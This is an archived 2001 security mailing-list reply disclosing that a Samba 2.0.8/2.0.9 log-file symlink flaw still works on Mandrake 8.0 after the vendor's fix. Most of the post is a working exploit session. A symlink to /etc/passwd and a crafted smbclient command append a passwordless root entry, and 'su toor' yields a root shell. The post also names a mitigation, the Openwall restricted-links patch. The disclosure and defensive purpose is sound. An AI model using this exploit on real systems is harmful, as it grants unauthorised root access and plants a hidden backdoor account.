On Mon, Jun 25, 2001 at 12:14:02AM +0200, maniacat_private wrote: > > Hi, > > Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here: > /var/log/samba/log.%m > > I replaced it with /var/log/samba/%m.log and used your exploit, which > worked - into /etc/passwd was appended also line: > toor::0:0::/:/bin/sh > > But until there was that two spaces onto begining of line, it was > impossible to su to that account, this is error message: > > Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown > > I tried to insert \r after the first \n, but unsucessfully. > I'm using pam-0.72-7mdk. > > This versions of PAM also don't permit spaces on begining of line: > pam-0.72-20.6.x (Redhat6.2) > pam-0.74-6mdk (Mandrake8.0( > > Maybe sshd without PAM support and permitting empty password may be > 'vulnerable' on such systems. [wilder@lysurus wilder]$ cat /etc/redhat-release Linux Mandrake release 8.0 (Traktopel) for i586 [wilder@lysurus wilder]$ rpm -q pam pam-0.74-6mdk [wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf # this tells Samba to use a separate log file for each machine log file = /var/log/samba/%m.log (= changed from default log.%m) # Put a capping on the size of the log files (in Kb). [wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd samba-2.0.9-1.3mdk [wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log [wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0 Anonymous login successful Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9] [wilder@lysurus wilder]$ tail /etc/passwd .. .. [2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927) Rejecting user 'wilder': authentication failed [2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213) ../../../tmp/x (127.0.0.1) couldn't find service toor::0:0::/:/bin/sh [wilder@lysurus wilder]$ su toor [root@lysurus wilder]# Appending to /etc/passwd has nothing to do with pam. Mandrake security fix of samba-2.0.9-1.3mdk does not solve this security problem. This exploit works with samba 2.0.8 without problems, too. Linux kernels with openwall patch (with restricted links in /tmp) are imunne to this type of attack (following symlinks does not work, link owner does not match with file's owner). Cheers, Pavol -- _______________________________________________________________________ [wilderat_private] [http://hq.alert.sk/~wilder] [talker: ttt.sk 5678]
This archive was generated by hypermail 2b30 : Mon Jun 25 2001 - 15:37:08 PDT